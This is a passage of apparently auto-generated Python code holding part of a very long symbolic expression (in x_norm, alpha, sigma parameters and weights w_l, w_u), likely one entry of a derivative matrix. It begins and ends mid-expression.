8*sigma_gamma**2)/sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2)) + 2.0*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dy0*y0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dy0*y0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**15.0*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - 1.0*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(dy0*y0 + dz0*z0)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**15.0*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(dy0*y0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**15.0*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)))*exp((23*sigma_alpha**2 + 39*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - (1 - exp(2*alpha*x_norm**0.5))*(dy0*(dz0*x0*y0*z0*x_norm**8.0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**5.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.5 - 2.0*sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 + 1.0*sigma_alpha**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 - 1.0*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0) + (dx0*y0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**6.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.5 - 2.0*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 + 1.0*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 - 1.0*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0) + dy0*x0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**6.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.5 - 2.0*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 + 1.0*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 - 1.0*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0))*x_norm**7.0) + dz0*(dy0*x0*y0*z0*x_norm**8.0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**5.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.5 - 2.0*sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 + 1.0*sigma_alpha**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 - 1.0*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0) + (dx0*z0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**6.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.5 - 2.0*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 + 1.0*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 - 1.0*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0) + dz0*x0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**6.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.5 - 2.0*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 + 1.0*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 - 1.0*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0))*x_norm**7.0))*x_norm**46.0*exp((15*sigma_alpha**2 + 26*sigma_gamma**2)*x_norm**1.0/(sigma_alpha**2*sigma_gamma**2)) + (dy0*(-4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0*y0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**13.5*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0*y0*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**13.5*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - dx0*sigma_alpha**2*sigma_gamma**2*y0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*dy0*sigma_alpha**2*x0*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((7*sigma_alpha**2 + 11*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + dy0*sigma_gamma**2*x0*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**9.0*(-4.0*alpha*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**4.5 + 4.0*alpha*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.5 + 2.0*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.0 + 1.0*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**6.0)*exp((2 + (7*sigma_alpha**2 + 8*sigma_gamma**2)/(2*sigma_gamma**2))*x_norm**1.0/sigma_alpha**2) + 2.0*sigma_alpha**2*sigma_gamma**2*x0*y0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**13.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - 1.0*sigma_alpha**2*x0*y0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(dx0*x0 + dz0*z0)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*sigma_gamma**2*x0*y0*(1 - exp(2*alpha*x_norm**0.5))**2*(dx0*x0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2))) + dz0*(-4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dy0*y0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**13.5*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0*z0*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dy0*y0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**13.5*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - dx0*sigma_alpha**2*sigma_gamma**2*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*dz0*sigma_alpha**2*x0*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((7*sigma_alpha**2 + 11*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + dz0*sigma_gamma**2*x0*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**9.0*(-4.0*alpha*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**4.5 + 4.0*alpha*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.5 + 2.0*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.0 + 1.0*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**6.0)*exp((2 + (7*sigma_alpha**2 + 8*sigma_gamma**2)/(2*sigma_gamma**2))*x_norm**1.0/sigma_alpha**2) + 2.0*sigma_alpha**2*sigma_gamma**2*x0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dy0*y0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**13.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - 1.0*sigma_alpha**2*x0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(dx0*x0 + dy0*y0)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*sigma_gamma**2*x0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(dx0*x0 + dy0*y0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2))))*x_norm**46.0*exp((23*sigma_alpha**2 + 40*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)))*exp(-(31*sigma_alpha**2 + 53*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2))/(sigma_alpha**2*sigma_gamma**2*(exp(2*alpha*x_norm**0.5) + 1)**3)],
[x_norm**(-61.0)*(dy0*(dy0*y0*(1.0*sigma_alpha**2*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((sigma_alpha**2 + 6*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + sigma_gamma**2*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**1.0*(-4.0*alpha*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**5.5 + 4.0*alpha*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.5 + 2.0*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 2*sigma_alpha**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + 1.0*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**7.0)*exp((5 + (sigma_alpha**2 + 2*sigma_gamma**2)/sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2)))*x_norm**7.0*exp((2*sigma_alpha**2 + 7*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + (dx0*x0 + dz0*z0)*(1.0*sigma_alpha**2*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((sigma_alpha**2 + 5*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + sigma_gamma**2*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**1.0*(-4.0*alpha*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**4.5 + 4.0*alpha*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.5 + 2.0*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.0 + 1.0*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**6.0)*exp((2 + (sigma_alpha**2 + 2*sigma_gamma**2)/(2*sigma_gamma**2))*x_norm**1.0/sigma_alpha**2))*x_norm**8.0*exp((sigma_alpha**2 + 4*sigma_gamma**2)*x_norm**1.0/(sigma_alpha**2*sigma_gamma**2)))*x_norm**46.0*exp((27*sigma_alpha**2 + 38*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + dy0*x_norm**45.0*(-4.0*alpha*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**14.5*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 4.0*alpha*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.5*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*dy0*sigma_alpha**2*y0*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**15.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + dy0*sigma_gamma**2*y0*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**9.0*(-4.0*alpha*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**5.5 + 4.0*alpha*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.5 + 2.0*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 2*sigma_alpha**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + 1.0*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**7.0)*exp((5 + (7*sigma_alpha**2 + 8*sigma_gamma**2)/sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2)) + 2.0*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**15.0*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - 1.0*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(dx0*x0 + dz0*z0)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**15.0*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(dx0*x0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**15.0*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)))*exp((23*sigma_alpha**2 + 